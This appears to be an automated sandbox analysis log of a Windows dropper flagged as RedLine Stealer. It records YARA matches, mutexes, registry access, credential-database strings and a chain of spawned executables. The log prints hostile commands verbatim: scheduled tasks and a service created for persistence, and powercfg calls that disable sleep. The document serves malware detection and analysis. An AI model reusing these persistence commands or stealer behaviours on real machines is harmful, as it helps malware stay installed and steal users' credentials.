Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: fiona[1].exe.0.dr Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: fiona[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: fiona[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9921875
Source: fiona[1].exe.0.dr Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: Section: ZLIB complexity 0.9921875
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr Static PE information: Section: .Right ZLIB complexity 0.9981044138707038
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr Static PE information: Section: .Shine ZLIB complexity 0.997067775974026
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@96/168@35/26
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Users\user\Documents\SimpleAdobe Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerExpert
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File created: C:\Users\user\AppData\Local\Temp\adobeLgVUNbWj4Aw0 Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File read: C:\Windows\System32\GroupPolicy\gpt.ini Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378404889.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376894246.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2402256117.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2404583587.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396510067.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2401953878.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397894755.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: WlCIinu0yp.exe ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe Virustotal: Detection: 66%
Source: hvkESMr10WtP7_E6btIJmDx0.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: unknown Process created: C:\Users\user\Desktop\WlCIinu0yp.exe "C:\Users\user\Desktop\WlCIinu0yp.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
